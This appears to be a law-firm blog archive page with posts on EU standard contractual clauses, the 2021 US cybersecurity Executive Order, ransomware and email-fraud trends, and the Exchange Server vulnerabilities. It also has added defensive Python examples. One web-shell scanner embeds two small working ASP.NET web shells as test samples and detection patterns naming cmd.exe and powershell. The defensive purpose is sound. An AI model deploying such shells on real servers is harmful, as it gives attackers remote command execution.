This post was originally posted on The Global Privacy Watch blog.

In a long-awaited decision, the European Commission (“Commission”) adopted two new sets of standard contractual clauses (“SCCs”) to reflect the EU’s General Data Protection Regulation (“EU GDPR”) and ‘the realities faced by modern business’ (see the Commission’s press release). These replace the current SCCs that were adopted over 10 years ago under the, now repealed, Data Protection Directive. The EU’s Commissioner for Justice, Didier Reynders, cited the SCCs as providing companies with ‘more safety and legal certainty’ and as being ‘user friendly tools’.

It is important to note that the new set of SCCs is significantly different than the previous set. For example, instead of focusing on the status of the parties as “controller” or “processor,” the new SCCs focus on the location of the parties, regardless of status. This is a significant departure from the prior form.

The two sets of SCCs are (i) for use between controllers and processors inside the EU/EEA, and (ii) for cross-border transfers between controllers and processors. Both can be used as of 27 June 2021. Note that the effect of Brexit has added

What are the key takeaways?

  • There are now approved SCCs for intra-EU agreements under Article 28. As a consequence, there is now a “safe harbor” to ensure all of an entity’s processor (Article 28) agreements are compliant. This did not exist previously.
  • The SCCs have a ‘modular approach’, enabling multiple parties to join and use them. Additionally, there will now only be a need for one agreement addressing both Article 28 and Article 46 requirements. Until the new SCCs came out, a different agreement was needed for each of the two Articles.
  • The SCCs account for the Schrems II decision, which in 2020 considered the validity of the previous SCCs in relation to international transfers. The SCCs outline the steps that data controllers/processors must follow to comply with the decision and provide possible supplementary measures that can be taken, if necessary (e.g. encryption, pseudonymisation).
  • As part of the Schrems II consideration, both data exporters and importers must warrant that they have carried out a local law assessment (i.e. relating to the jurisdiction that will receive the data) and that they have no reason to believe that local laws/practices would prevent the importer from complying with its obligations under the SCCs.
  • There is an 18 month transition period for controllers and processors to update the current SCCs in their contracts, intra-group transfer agreements etc. This is a welcome improvement on the 12 month period suggested in the November drafts. The previous SCCs can still be included in new contracts until 27 September 2021, but these contracts will then need to be updated within the transition period.

Practical Implications

The new SCCs have made some significant changes in how the clauses are implemented, and in how hard it is to implement them. The previous SCCs were fairly simple to implement: you filled in the blanks in the appropriate form (controller-to-controller or controller-to-processor) and you were done. The new SCCs are not as easy an exercise. While the data flows covered by the original SCCs are still present, the new SCCs recognise that services businesses in the EU should not be left out of the thinking. And since an EU processor working with foreign (e.g. US) data should not have the GDPR imposed on exclusively non-EU data, we now have “processor to sub-processor” and “processor to controller” modules.

In addition to the various modules, there are embedded “options” within the modules as well (e.g. Clause 13). This is a significantly different format, and one which will require legal counsel to determine which module and options to use.

Along with the counsel needed to figure out just which modules and options to use in the SCCs, the Schrems II considerations also now demand a much higher level of legal work as part of the execution of the SCCs. Now, parties have to undertake a legal evaluation of whether or not there are local law issues which might make the enforcement of the SCCs’ provisions (including enforcement by third-party beneficiaries) problematic. This evaluation has to be documented, and this documentation has to be in a form that is available to a supervisory authority should it request it. This means the documentation can’t be hidden away under attorney-client confidentiality rules. It will need to be available to a public authority.

There are a number of other tactical changes, some of which are welcome (e.g. how to deal with general authorizations of sub-processors) and some of which are less so (e.g. having to identify a specific supervisory authority where the importer doesn’t have an EU Representative). However, these will have significantly less of a “cost to implement” than the new structural and analytical requirements.

How does this affect transfers with the UK?

The SCCs are not applicable to the UK GDPR. However, the UK’s Information Commissioner’s Office (“ICO”) has said it will consider recognising the SCCs as a valid transfer mechanism under the UK GDPR. In any event, the ICO is planning to propose, and consult on, bespoke UK SCCs for international transfers later this year. That being said, it is possible that recognition of the EU SCCs will be contingent on the UK retaining its adequacy decision, which is currently under scrutiny. Also, the ICO has already adopted the use of the prior SCCs as part of the Brexit package. It would follow that the UK would have some sort of recognition of the EU SCCs, even in light of the UK promulgating its own. This is similar to the way the Swiss and the EU have managed interoperability between their respective SCCs.

Seyfarth Synopsis:  On May 12, 2021, President Joe Biden issued a very broad, 34-page “Executive Order on Improving the Nation’s Cybersecurity.” The Executive Order, or “EO”, can be found here. This order comes six months after the notorious SolarWinds attack, and mere weeks after other high-profile attacks invaded our networks and shut down pieces of the nation’s critical infrastructure, causing gasoline shortages in certain parts of the country.

By “force of law” the EO applies only to the federal government and federal government systems. By extension, the EO applies, or will apply, to thousands of government contractors and subcontractors that provide IT goods and services (e.g., software) to the US government. Notably, many of the cybersecurity provisions have yet to be written and many will have to go through a drafting and comment period. Some of the provisions may look “new” but have actually been around for a while (like multi-factor authentication and end-point solutions).

The order does not touch on every aspect of US business, like critical infrastructure, but it is a wonderfully good start as it sets forth certain policies and procedures that every business must (if you are a government contractor) or at least should consider enacting. The clear implication of the EO is that the government, IT contractors and providers, and the private sector can no longer wait around for the next shoe to drop. The time for action is now.

So despite being aspirational (at least for today and for some time in the future), the EO makes probably its most important point in its opening statement (Section 1. “Policy”): “We are all in this together.” Indeed the EO opens by noting:

“(C)ybersecurity requires more than government action. Protecting our Nation from malicious cyber actors requires the Federal Government to partner with the private sector. The private sector must adapt to the continuously changing threat environment, ensure its products are built and operate securely, and partner with the Federal Government to foster a more secure cyberspace.”

Let’s examine below certain pieces of the EO as it applies both to the federal government and to government IT contractors and providers. The private sector should note that, as with other “standards” like the NIST Cybersecurity Framework (issued under the Obama Administration in February 2014), to the extent a business does not follow the guidance and policies in the EO, it may fall squarely in the crosshairs of plaintiffs’ class action counsel, who will ask: if it was in the EO, why didn’t you follow the same guidance?

Removing Barriers to Sharing Threat Information

Given their position in providing IT goods and services to the government, the EO notes that the IT providers are in a very good position to know better than the government the threat landscape and incident information that affect the federal systems they serve. But by contract, the IT provider might be precluded from sharing that information with the government.

In response, the EO pledges that within 120 days, amendments to the contractual language already in use by the federal government are to be recommended to ensure that cyber threat intelligence as well as cyber incident response information can be shared promptly, ideally within three days (a three-day period is already in place under certain federal, state and EU guidelines). The EO is clear on this point: information sharing is one of its highest priorities.

Modernizing Federal Government Cybersecurity

Another high priority of the Biden Administration is the modernization of the federal government cybersecurity architecture (see Section Three of the EO):

“To keep pace with today’s dynamic and increasingly sophisticated cyber threat environment, the Federal Government must take decisive steps to modernize its approach to cybersecurity, including by increasing the Federal Government’s visibility into threats, while protecting privacy and civil liberties. The Federal Government must adopt security best practices; advance toward Zero Trust Architecture; accelerate movement to secure cloud services, including Software as a Service (SaaS), Infrastructure as a Service (IaaS), and Platform as a Service (PaaS); centralize and streamline access to cybersecurity data to drive analytics for identifying and managing cybersecurity risks; and invest in both technology and personnel to match these modernization goals.”

What does this mean at the end of the day?

  • Recognizing that the cloud is likely the future of data storage for the majority of the US Government, yet the cloud has its own set of unique risks and thus needs its own security and incident response strategy;
  • That the government will move towards a recognized system of identity and access management, including mandatory multi-factor authentication; and that
  • The government will adopt encryption of data at rest and in transit.

Enhancing Software Supply Chain Security

This section clearly relates to the government’s previous responses to the SolarWinds cybersecurity attack disclosed in December 2020. Here, the EO calls upon the National Institute of Standards and Technology to produce guidelines for enhancing software supply chain security. This guidance shall include standards, procedures or criteria regarding:

  • secure software development environments, including such actions as:
    • using administratively separate build environments;
    • auditing trust relationships;
    • establishing multi-factor, risk-based authentication and conditional access across the enterprise;
    • documenting and minimizing dependencies on enterprise products that are part of the environments used to develop, build, and edit software;
    • employing encryption for data; and
    • monitoring operations and alerts and responding to attempted and actual cyber incidents;
  • generating and, when requested by a purchaser, providing artifacts that demonstrate conformance to the processes set forth in subsection (e)(i);
  • employing automated tools, or comparable processes, to maintain trusted source code supply chains, thereby ensuring the integrity of the code;
  • employing automated tools, or comparable processes, that check for known and potential vulnerabilities and remediate them, which shall operate regularly, or at a minimum prior to product, version, or update release.
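Two of the items above (automated tools that maintain a trusted source code supply chain, and automated tools that check for known vulnerabilities before release) are concrete enough to show in code. The following is an added example, written for this page rather than taken from the EO, NIST or the original post. It verifies that every dependency an imaginary build fetched matches the SHA-256 digest pinned in a lockfile, and flags any dependency whose version falls inside a known-vulnerable range. The lockfile syntax, the advisory identifier, the package names and the artifact bytes are all constructed for the example.

```python
"""Automated dependency checks for a build pipeline.

Added example, not part of the Executive Order or the original post. It
demonstrates two of the checks listed above: verifying that every fetched
dependency matches the SHA-256 digest pinned in a lockfile (source integrity)
and flagging dependencies whose version falls inside a known-vulnerable range
(vulnerability checking before release). The lockfile syntax, the advisory
identifier and the artifact bytes are all constructed for this example.
"""
import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    package: str
    version: str
    kind: str    # "unpinned", "missing-artifact", "hash-mismatch" or "vulnerable"
    detail: str


def parse_lockfile(text):
    """Parse constructed 'name==version [sha256=<hex>]' lines into (name, version, digest)."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        spec, _, rest = line.partition(" ")
        name, _, version = spec.partition("==")
        digest = None
        for token in rest.split():
            if token.startswith("sha256="):
                digest = token[len("sha256="):].lower()
        entries.append((name, version, digest))
    return entries


def parse_version(version):
    """Dotted numeric versions only, e.g. '1.4.2' -> (1, 4, 2)."""
    return tuple(int(part) for part in version.split("."))


def is_vulnerable(version, introduced, fixed):
    """Affected if introduced <= version < fixed (fixed=None means no fix exists yet)."""
    v = parse_version(version)
    return parse_version(introduced) <= v and (fixed is None or v < parse_version(fixed))


def check_dependencies(lockfile_text, artifacts, advisories):
    """artifacts: {name: bytes fetched by the build}; advisories: {name: [(introduced, fixed, id)]}."""
    findings = []
    for name, version, digest in parse_lockfile(lockfile_text):
        if digest is None:
            findings.append(Finding(name, version, "unpinned", "no sha256 pinned; integrity cannot be verified"))
        elif name not in artifacts:
            findings.append(Finding(name, version, "missing-artifact", "pinned but never fetched"))
        else:
            actual = hashlib.sha256(artifacts[name]).hexdigest()
            if actual != digest:
                findings.append(Finding(name, version, "hash-mismatch",
                                        f"expected {digest[:12]}..., got {actual[:12]}..."))
        for introduced, fixed, adv_id in advisories.get(name, []):
            if is_vulnerable(version, introduced, fixed):
                rng = f">={introduced}" + (f",<{fixed}" if fixed else "")
                findings.append(Finding(name, version, "vulnerable", f"{adv_id} affects {rng}"))
    return findings


# Constructed sample data: one clean package, one artifact modified after its
# hash was pinned, one package with a made-up advisory, and one unpinned package.
GOOD_BLOB = b"goodlib-1.4.2 release tarball bytes"
TAMPERED_BLOB = b"utillib-2.0.0 tarball bytes, modified after the hash was pinned"
OLDPARSER_BLOB = b"oldparser-0.9.1 release tarball bytes"

SAMPLE_LOCKFILE = f"""
# constructed lockfile for the example
goodlib==1.4.2 sha256={hashlib.sha256(GOOD_BLOB).hexdigest()}
utillib==2.0.0 sha256={'0' * 64}
oldparser==0.9.1 sha256={hashlib.sha256(OLDPARSER_BLOB).hexdigest()}
loosedep==3.1.0
"""
SAMPLE_ARTIFACTS = {"goodlib": GOOD_BLOB, "utillib": TAMPERED_BLOB,
                    "oldparser": OLDPARSER_BLOB, "loosedep": b"x"}
SAMPLE_ADVISORIES = {"oldparser": [("0.8.0", "1.0.0", "EXAMPLE-ADV-0001")]}  # constructed identifier


def run_sample():
    """Run the checks on the constructed data; a real pipeline would fail the build on any finding."""
    return check_dependencies(SAMPLE_LOCKFILE, SAMPLE_ARTIFACTS, SAMPLE_ADVISORIES)


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f.kind:16} {f.package}=={f.version}: {f.detail}")
```

Run on the constructed data, the check reports the tampered artifact (hash mismatch), the package inside the advisory range, and the unpinned package; the clean package produces nothing. A build that only ran this after release would satisfy the letter of item (iv) but not its intent, so the natural place for it is a gating step before artifacts are signed.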

Improving Detection of Cybersecurity Vulnerabilities and Incidents

Finally, as is already common in the private sector, the EO urges the adoption of endpoint detection and response (EDR) initiatives to support proactive detection of cybersecurity incidents within federal government infrastructure, active cyber hunting, containment and remediation, and incident response. The hope is that such initiatives will support a “playbook” that delivers on the EO’s mandate for better incident response and remediation capabilities across all levels and departments of government.

The above is just a partial list of initiatives that the Biden Administration has put forth in the EO. There are indeed other initiatives that bear close examination like the NIST Cybersecurity Framework, and there are other technologies, like machine learning anomaly detection devices that also can potentially make the federal government more “cyber safe.” But, the most important part of the EO is that now “there is a plan.” A plan that will be reviewed by experts like the NIST, and thereafter refined and put into place. And with all good fortune that plan will spread like wildfire across the whole private sector as well. Then all parts of government and industry will likely be more cyber safe.

As the global pandemic begins to show signs of waning, cyber risk is showing no such easing.  In fact, in a recent survey, over 68% of business leaders reported believing that their cybersecurity risks are increasing, despite their own mitigation strategies. Organizations in this coming year will continue to face a constantly evolving threat landscape and increasing threat actor sophistication. Catastrophic supply-chain breaches in 2020 have made organizations rethink which devices, software, and hardware are trustworthy in their environments. While nation-state actors with significant resources appear to have carried out the recent major supply chain attack(s), even “script kiddie” threat actors are expanding their capabilities and improving their techniques. Several trends are on the horizon for this next year.  They are as follows:

Ransomware Is Evolving to Data Exfiltration and Extortion

Historically, ransomware focused on infiltrating organization endpoints and locking the organization out of their own data. While temporarily paralytic, organizations generally made it through those events by either paying the ransom, or recovering their data from disaster recovery or backup media. Tactics have changed for many ransomware threat actors, however, and now many seek to exfiltrate data in addition to deploying ransomware. They do this so that if an organization fails to pay the ransom amount, then they can fall back on the exfiltrated data to extort the organization. If the organization still fails to pay the new extortion ransom, the data is then leaked, usually on the Dark Web. In the first instance, effective incident management with experienced professionals is critical to managing your way through the incident. In the event of disclosure of data, there are also many issues that arise including potential disclosure of attorney-client communication, work product, trade secrets, and PHI/PII. Our prior blog post covers this specific situation in more detail.

Email Compromise Events Will Rise Along with Wire Fraud

Incidents involving threat actors gaining access to organizational email accounts will continue to rise in 2021. This increase can be attributed to password re-use, credential harvesting attacks, data leaks following a breach or extortion event, malware, phishing, smishing, etc. The motivation for these attacks typically involves obtaining information that can be used to facilitate other types of attack. Threat actors steal signature lines, email recipient metadata, prior dealing information, and payment information. This allows a threat actor to set up convincing-looking emails/invoices to perpetrate bank fraud, in the form of a request that a fake invoice be paid or that bank information be changed. Unfortunately, this person-in-the-middle type attack often goes undetected by the legitimate employees involved. In 2021, organizations should focus on employee training to increase awareness, sophistication, and “cyber-suspicion” of their employees. Organizations will benefit from taking a closer look at their email system logging to ensure that the requisite logs are available to conduct investigations following a business email compromise.
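The logging point above is worth making concrete. Two behaviours that typically precede the fake-invoice stage of a business email compromise show up in mailbox audit logs: the attacker creates inbox rules that forward finance-related mail outside the organization or delete it so the real employee never sees the replies, and the account is signed into from a location the legitimate user could not have reached in the time available. The following is an added example, not from the original post, that hunts for both in a log. The log lines are constructed in a simplified JSON-lines format for the example (not any vendor's schema), and the field names, the internal domain `example.com` and the two-hour travel window are assumptions.

```python
"""Hunting business email compromise (BEC) indicators in mailbox audit logs.

Added example, not from the original post. The log lines are constructed in a
simplified JSON-lines format for this example (not any vendor's schema); the
field names, the internal domain and the travel window are assumptions.
Flags: inbox rules that forward to an external domain or hide finance-related
mail, and sign-ins for one account from two countries within a short window.
"""
import json
from datetime import datetime, timedelta

INTERNAL_DOMAIN = "example.com"             # assumed: the organization's own domain
FINANCE_TERMS = ("invoice", "payment", "wire", "bank")
TRAVEL_WINDOW = timedelta(hours=2)          # assumed: two countries inside this gap is not travel

# Constructed sample log (documentation IP ranges, reserved example domains).
SAMPLE_LOG = """\
{"ts": "2021-02-03T08:02:11Z", "user": "ap.clerk@example.com", "op": "MailboxLogin", "ip": "203.0.113.7", "country": "US"}
{"ts": "2021-02-03T08:40:55Z", "user": "ap.clerk@example.com", "op": "MailboxLogin", "ip": "198.51.100.23", "country": "NG"}
{"ts": "2021-02-03T08:43:10Z", "user": "ap.clerk@example.com", "op": "New-InboxRule", "params": {"Name": "sync", "ForwardTo": "ap.clerk.backup@mail.example", "SubjectContainsWords": ["invoice", "wire"]}}
{"ts": "2021-02-03T08:44:02Z", "user": "ap.clerk@example.com", "op": "New-InboxRule", "params": {"Name": "cleanup", "DeleteMessage": true, "FromAddressContainsWords": ["bank"]}}
{"ts": "2021-02-03T09:10:00Z", "user": "cfo@example.com", "op": "MailboxLogin", "ip": "203.0.113.9", "country": "US"}
{"ts": "2021-02-03T09:12:30Z", "user": "cfo@example.com", "op": "New-InboxRule", "params": {"Name": "newsletters", "MoveToFolder": "Reading", "FromAddressContainsWords": ["news"]}}
"""


def parse_log(text):
    """One JSON object per line; timestamps are UTC in the constructed format."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(ev)
    return events


def _condition_words(params):
    """Collect the match words of every '*ContainsWords' rule condition, lower-cased."""
    words = []
    for key, value in params.items():
        if key.endswith("ContainsWords") and isinstance(value, list):
            words.extend(str(w).lower() for w in value)
    return words


def rule_findings(events):
    """Inbox rules that forward externally, or that delete/move finance-related mail."""
    findings = []
    for ev in events:
        if ev["op"] not in ("New-InboxRule", "Set-InboxRule"):
            continue
        p = ev.get("params", {})
        touches_finance = any(term in w for w in _condition_words(p) for term in FINANCE_TERMS)
        target = p.get("ForwardTo") or p.get("RedirectTo")
        if target and target.rsplit("@", 1)[-1].lower() != INTERNAL_DOMAIN:
            findings.append({"user": ev["user"], "rule": p.get("Name"),
                             "reason": "external-forward", "target": target})
        elif touches_finance and (p.get("DeleteMessage") or p.get("MoveToFolder")):
            findings.append({"user": ev["user"], "rule": p.get("Name"),
                             "reason": "hides-finance-mail"})
    return findings


def travel_findings(events):
    """Consecutive logins for one user from different countries inside TRAVEL_WINDOW."""
    by_user = {}
    for ev in events:
        if ev["op"] == "MailboxLogin":
            by_user.setdefault(ev["user"], []).append(ev)
    findings = []
    for user, logins in by_user.items():
        logins.sort(key=lambda e: e["ts"])
        for a, b in zip(logins, logins[1:]):
            gap = b["ts"] - a["ts"]
            if a["country"] != b["country"] and gap <= TRAVEL_WINDOW:
                findings.append({"user": user, "from": a["country"], "to": b["country"],
                                 "minutes": int(gap.total_seconds() // 60)})
    return findings


def hunt(text):
    events = parse_log(text)
    return {"rules": rule_findings(events), "travel": travel_findings(events)}


if __name__ == "__main__":
    for kind, items in hunt(SAMPLE_LOG).items():
        for item in items:
            print(kind, item)
```

On the constructed log the two rules created from the Nigerian sign-in are flagged (one forwards invoice and wire mail to an outside address, the other deletes anything from the bank), the accounts-payable clerk's US-then-NG sign-ins 38 minutes apart are flagged, and the CFO's ordinary newsletter rule is not. The practical lesson for the logging point above is that none of this is possible unless rule-creation and sign-in events are being retained at all; confirm that before an incident, not after.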

To review Seyfarth’s full 2021 Commercial Litigation Outlook, click here.

You may also register for Seyfarth’s webinar regarding Post-Pandemic Trends and Emerging Challenges in 2021 here.

This month, the cybersecurity research firm Volexity found a series of four critical security vulnerabilities in Microsoft’s Exchange Server software.  Since then, the vulnerabilities have been independently verified and confirmed by Microsoft.  They are believed to have been used by foreign-state threat actors for an unknown period of time, extending back at least to January 2021.  Exchange is the back-end software that handles email for the vast majority of large organizations; Outlook connects to Exchange to display email for user accounts.

While the vulnerabilities do not affect customers running Microsoft’s Exchange Online service exclusively, most organizations in the US are running some form of Internet-facing Microsoft Outlook Web Access (OWA) for their email systems in tandem with on-premises Exchange servers.

Companies that use Microsoft Exchange Server for email messaging in any version should take immediate steps to address the situation.  Office 365 (Exchange Online) is not affected, but companies running on-premises Exchange servers in a hybrid deployment with Office 365 are still vulnerable.  The vulnerabilities affect on-premises Exchange Server 2013, 2016 and 2019 (Microsoft also issued a defense-in-depth update for Exchange Server 2010).  The exploited vulnerabilities, and the back door they are used to plant, give a remote attacker full access to and control of the organization’s Exchange server, including all the data residing on it: emails, attachments, contacts, notes, tasks, calendar items, etc.  Attackers using the vulnerabilities can also identify a mailbox by user name and view or copy the entire mailbox contents.

The seriousness of the issue is difficult to overstate.  Using the exploit, intruders are able to leave behind one or more “web shell” scripts for future use.  A web shell is an easily-operated, often password-protected hacking tool that can be accessed from any browser over the Internet; because it is an ordinary server-side script file of the same type as the server’s legitimate pages, it is difficult to identify as malware by file type alone. Continue Reading Organizations Using Microsoft Exchange Mail Server Face Severe Cybersecurity Threat
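Because a web shell cannot be told apart from a legitimate page by its extension, a hunt for one has to look at what the script does. The following is an added example, written for this page and not taken from the original post or from Volexity’s research. It scores the content of ASP.NET script files on a handful of behaviours that a web shell needs and a normal page rarely combines: taking input straight from the request, handing it to an evaluator or a process launcher, and echoing the result. The files are constructed in memory, the directory names are assumptions rather than a real server layout, and the indicator weights and threshold are tuning choices, not published detection rules.

```python
"""Content-based hunt for ASP.NET web shells.

Added example, not from the original post or Volexity's research. A web shell
is an ordinary server-side script, so this scores file *content*: a script that
reads attacker-controlled request data and feeds it to an evaluator, a process
launcher or a file writer is suspicious wherever it sits. The files below are
constructed in memory; paths, weights and threshold are assumptions.
"""
import re

# (regex, weight, description); all matched case-insensitively, each counted once per file.
INDICATORS = [
    (r"\beval\s*\(", 3, "dynamic code evaluation"),
    (r"Request(\.Form|\.QueryString|\.Headers|\.Item)?\s*\[", 2, "reads attacker-controlled request data"),
    (r"Process\.Start|ProcessStartInfo|cmd\.exe|powershell", 3, "launches a process"),
    (r"File\.WriteAllText|StreamWriter|SaveAs\s*\(", 2, "writes files on the server"),
    (r"FromBase64String", 2, "decodes a base64 payload"),
    (r"<script\s+runat=\"?server\"?\s+language=\"?jscript", 3, "server-side JScript block"),
    (r"Response\.Write", 1, "echoes output to the client"),
]
COMPILED = [(re.compile(pattern, re.IGNORECASE), weight, desc) for pattern, weight, desc in INDICATORS]
SCRIPT_EXTENSIONS = (".aspx", ".ashx", ".asmx", ".asax")
THRESHOLD = 5   # assumed tuning value: a lone Request[] read plus Response.Write scores 3


def score_content(content):
    """Sum the weights of every indicator present; return (score, matched descriptions)."""
    score, reasons = 0, []
    for rx, weight, desc in COMPILED:
        if rx.search(content):
            score += weight
            reasons.append(desc)
    return score, reasons


def scan_files(files, threshold=THRESHOLD):
    """files: {path: text content}. Returns [(path, score, reasons)] for files at or above threshold."""
    hits = []
    for path, content in files.items():
        if not path.lower().endswith(SCRIPT_EXTENSIONS):
            continue        # only files the web server would execute as script
        score, reasons = score_content(content)
        if score >= threshold:
            hits.append((path, score, reasons))
    return sorted(hits, key=lambda hit: -hit[1])


# Constructed sample "file system": two benign pages, a text file that merely
# mentions eval, and two files with web-shell behaviour. Paths are assumptions.
SHELL_A = "wwwroot/owa/auth/errorFF.aspx"
SHELL_B = "wwwroot/aspnet_client/system_web/help.aspx"
SAMPLE_FILES = {
    "wwwroot/owa/auth/logon.aspx": """<%@ Page Language="C#" %>
<% string back = Request.QueryString["url"]; Response.Write(Server.HtmlEncode(back)); %>""",
    "wwwroot/ecp/default.aspx": """<%@ Page Language="C#" %>
<html><body><h1>Exchange admin center</h1></body></html>""",
    "wwwroot/owa/readme.txt": "eval(Request['x']) appears here but this is not a file the server executes",
    SHELL_A: """<script runat="server" language="JScript">
function Page_Load(){ eval(Request["cmd"]); }
</script>""",
    SHELL_B: """<%@ Page Language="C#" %>
<% var psi = new System.Diagnostics.ProcessStartInfo("cmd.exe", "/c " + Request.Form["c"]);
   psi.RedirectStandardOutput = true; psi.UseShellExecute = false;
   var p = System.Diagnostics.Process.Start(psi);
   Response.Write(p.StandardOutput.ReadToEnd()); %>""",
}


if __name__ == "__main__":
    for path, score, reasons in scan_files(SAMPLE_FILES):
        print(f"{score:2d}  {path}: {', '.join(reasons)}")
```

On the constructed files the JScript page that evaluates a request parameter scores 8 and the page that pipes a form field into cmd.exe scores 6, while the logon page (which reads a query parameter and writes it back, a normal thing for a page to do) scores 3 and is not reported. In a real hunt this content score is one signal among several: pair it with file modification times, a diff against a known-clean install of the same Exchange build, and the web server's request logs for the flagged paths.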

Seyfarth Synopsis:  The attorney-client privilege is a bedrock legal principle that protects a client from providing a court or adversary with confidential communications exchanged in the course of providing or receiving legal advice with an attorney.  Cybersecurity data breaches, often accompanied by ransom/extortion demands and threats of publication of sensitive information, diminish the attorney-client privilege protection and raise ethical issues as to an attorney’s duty in protecting the privilege from being waived.  Continue Reading Ransomware with Data Exfiltration and Threatened Leak Extortion

A nationwide fraudulent unemployment benefits cyber scam has been making headlines for many months now and still continues to threaten employers and countless individuals throughout the United States.   Threat actors continue to exploit overwhelmed governmental agencies and are filing claims for benefits using the personal information of people who have not lost their jobs.  Fraudulent claims paid out to threat actors have been estimated in the hundreds of millions of dollars.  This fraud is a sharp reminder that sensitive personal information in the wrong hands can result in tremendous harm.  Employers should remain vigilant and alert their workforce, promptly challenge fraudulent claims, and check cyber-security practices and policies to help protect against this and other cyber threats.

It is estimated that nearly 53 million unemployment claims were filed during the first few months of the coronavirus pandemic, and the threat has continued into 2021.  Many state agencies, already understaffed and functioning with older technology and fraud detection protocols, were not prepared for the onslaught and have become tremendously overwhelmed.  The resulting delays and chaos in processing so many unemployment claims in such a short time have set the perfect stage for threat actors to take advantage.

Under normal circumstances, when the unemployment claim is filed, the agency will send  timely notice to the employer to provide the opportunity to protest the claim.  Typically the employer has ten days to protest.  However, during the pandemic, unemployment offices across the country have struggled to get the notices out to employers – taking months rather than days.  Consequently, employers are receiving the protest notices after the time has expired to protest the claim.  Most people learn they are affected when they get a notice from the state unemployment benefits office about their supposed application for benefits.  By then, however, the benefits usually have been paid to an account the criminals control.  Further, it is not clear given the magnitude of claims and impact on individuals whether in some instances agencies are paying even before they send the protest notice. Continue Reading COVID-19 Unemployment Benefits Scams Continue Well Into the Pandemic

Business executives face the challenge of improving their company’s cybersecurity posture while balancing costs. The consequences of a cyberattack – including lost revenue, customers, diminished reputation and credibility, or even total shut down – force executives to prioritize cybersecurity within their budgets and strategize how to best allocate their limited resources. How should business executives prioritize improving their cybersecurity postures in the most cost-effective way?

Join us for this web event where Joe Rooney of BDO will moderate a discussion between Ric Opal of BDO Digital and Scott Carlson of Seyfarth Shaw to share what cybersecurity strategies and industry trends they are seeing in the market from an executive perspective.

We’ll look at:

  • Trending cybersecurity legal risks that businesses are facing – including breach prevention, incident response, employee training, and resulting litigation
  • What businesses are doing to successfully implement a cybersecurity strategy
  • If you do nothing else, do these three things to protect your organization, data, and people

Speakers

Scott Carlson, Partner, Seyfarth Shaw LLP
Ric Opal, Principal, BDO Digital, LLC

Moderator

Joe Rooney, Business Development, BDO USA, LLP

California has once again decided it needed to pass privacy legislation to protect the residents of the great state from the nefarious actions of Big Tech. However, this time they did it with a ballot initiative and not via the thoughtful (mostly) mechanism of the legislative process. The proponents of the California Privacy Rights Act of 2020 (“CPRA”) touted this as an improvement over the CCPA – but is it really? To listen to the proponents of the CPRA, it aims to strengthen California consumer privacy rights, while for the most part, avoiding the imposition of overly-burdensome requirements on a business, particularly those businesses that are already CCPA compliant. So, what’s changed, really? Continue Reading California Prop 24 – Is the New Privacy Law Really New (Or Is the Sky Falling)

From court closures and the way judges conduct appearances and trials to the expected wave of lawsuits across a multitude of areas and industries, the COVID-19 outbreak is having a notable impact in the litigation space—and is expected to for quite some time.

To help navigate the litigation landscape, we are kicking off a webinar series that will take a look at what’s happening now and what to expect in terms of litigation practice and litigation trends in the months to come. The initial webinars detailed below will be supplemented by topic-specific programs that will take a deeper dive into the respective topics. Feel free to attend one or all, and please invite your colleagues.


Court Is “In Session”: The Post-Pandemic Courthouse

In the first installment of our Post-Pandemic Litigation Webinar Series, Seyfarth litigators from a variety of legal disciplines will examine the virtual courthouse in a post-pandemic world. Specifically, our presenters will address:

  • What is going on in courts across the country, and how/when are they rescheduling
  • How will state, federal, and bankruptcy courts run post-pandemic
  • Will we be able to have jury trials
  • How long this “new normal” is expected to last
  • Tools needed to adapt and keep your cases moving forward
Moderator:

Scott Carlson, Partner, Seyfarth Shaw

Speakers:

Suzanna Bonham, Partner, Seyfarth Shaw
Gina Ferrari, Partner, Seyfarth Shaw
William Hanlon, Partner, Seyfarth Shaw
Scott Humphrey, Partner, Seyfarth Shaw

Tuesday, July 14, 2020

1:00 p.m. to 2:00 p.m. Eastern
12:00 p.m. to 1:00 p.m. Central
11:00 a.m. to 12:00 p.m. Mountain
10:00 a.m. to 11:00 a.m. Pacific

If you have any questions, please contact Colleen Vest at cvest@seyfarth.com and reference this event.


New Era, New Litigation: Lawsuits You Can Expect in the Post-Pandemic Environment

During the second installment of our Post-Pandemic Litigation Webinar Series, our panel will provide high-level insights on what companies of all sizes can expect in terms of litigation as a result of COVID-19. Specifically, our presenters will address the high-level trends we are observing in the following areas:

  • Bankruptcy and Financial Services
  • Class Actions and TCPA
  • Commercial Litigation
  • Construction and Real Estate Litigation
  • Health Care, Life Sciences, and Pharmaceutical
  • Securities Litigation
  • Trade Secrets and Cybersecurity/Privacy
Moderator:

James McGrath, Partner, Seyfarth Shaw

Speakers:

Kristine Argentine, Partner, Seyfarth Shaw
Jesse Coleman, Partner, Seyfarth Shaw
Tonya Esposito, Partner, Seyfarth Shaw
Richard Lutkus, Partner, Seyfarth Shaw
Kate Schumacher, Partner, Seyfarth Shaw
Rebecca Woods, Partner, Seyfarth Shaw

Wednesday, July 22, 2020

1:00 p.m. to 2:00 p.m. Eastern
12:00 p.m. to 1:00 p.m. Central
11:00 a.m. to 12:00 p.m. Mountain
10:00 a.m. to 11:00 a.m. Pacific

If you have any questions, please contact Danielle Freeman at dfreeman@seyfarth.com and reference this event.

Yesterday, California Attorney General Xavier Becerra announced his submission of the Final Regulations under the California Consumer Privacy Act (CCPA) to the California Office of Administrative Law (OAL).  Under the California Administrative Procedure Act (APA), the OAL has 30 business days plus 60 calendar days (due to a COVID-related executive order) to determine whether the regulations meet the requirements of the APA.  This final submission comes after various public forums, hearings, commentary, and revisions to the regulations.

Back in April, we discussed our expectations for the Final Regulations, which remain largely unchanged from the March 11, 2020 draft.  In that post, we assessed certain elements of the Regulations that seemed to be in flux, such as notice at collection and of financial incentives, consumer opt-out rights, and the handling of requests to know and delete.

